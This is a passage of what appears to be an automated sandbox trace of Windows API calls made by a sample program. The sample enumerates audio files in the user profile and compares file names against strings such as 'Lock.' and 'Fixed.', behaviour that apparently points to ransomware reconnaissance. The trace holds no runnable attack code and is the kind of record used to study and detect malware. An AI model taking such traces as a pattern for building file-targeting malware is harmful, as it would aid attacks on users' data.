PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725cd5e0, ftCreationTime.dwHighDateTime=0x1d5d61d, ftLastAccessTime.dwLowDateTime=0x7a6e0b10, ftLastAccessTime.dwHighDateTime=0x1d5d644, ftLastWriteTime.dwLowDateTime=0x7a6e0b10, ftLastWriteTime.dwHighDateTime=0x1d5d644, nFileSizeHigh=0x0, nFileSizeLow=0x150f9, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="pGVUGdUF Vft.mp3", cAlternateFileName="PGVUGD~1.MP3")) returned 1 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61645420, ftCreationTime.dwHighDateTime=0x1d5d6fe, ftLastAccessTime.dwLowDateTime=0xd7f19970, ftLastAccessTime.dwHighDateTime=0x1d5d188, ftLastWriteTime.dwLowDateTime=0xd7f19970, ftLastWriteTime.dwHighDateTime=0x1d5d188, nFileSizeHigh=0x0, nFileSizeLow=0x12ec0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="QibhfcBitUE3eN.wav", cAlternateFileName="QIBHFC~1.WAV")) returned 1 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda42a390, ftCreationTime.dwHighDateTime=0x1d5d4e4, ftLastAccessTime.dwLowDateTime=0x1137f5f0, ftLastAccessTime.dwHighDateTime=0x1d5ce85, ftLastWriteTime.dwLowDateTime=0x1137f5f0, ftLastWriteTime.dwHighDateTime=0x1d5ce85, nFileSizeHigh=0x0, nFileSizeLow=0xcc62, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="YXHKkgRMJbmq7xZC.mp3", cAlternateFileName="YXHKKG~1.MP3")) returned 1 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21cea590, ftCreationTime.dwHighDateTime=0x1d5cc18, ftLastAccessTime.dwLowDateTime=0x6a2417d0, ftLastAccessTime.dwHighDateTime=0x1d5cd6c, ftLastWriteTime.dwLowDateTime=0x6a2417d0, ftLastWriteTime.dwHighDateTime=0x1d5cd6c, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="_qp6.wav", cAlternateFileName="")) returned 1 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.619] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.620] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0205.620] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.620] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.621] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0205.621] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0205.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0205.621] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0205.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0205.623] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0205.623] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0205.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0205.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0205.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0205.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0205.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.626] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 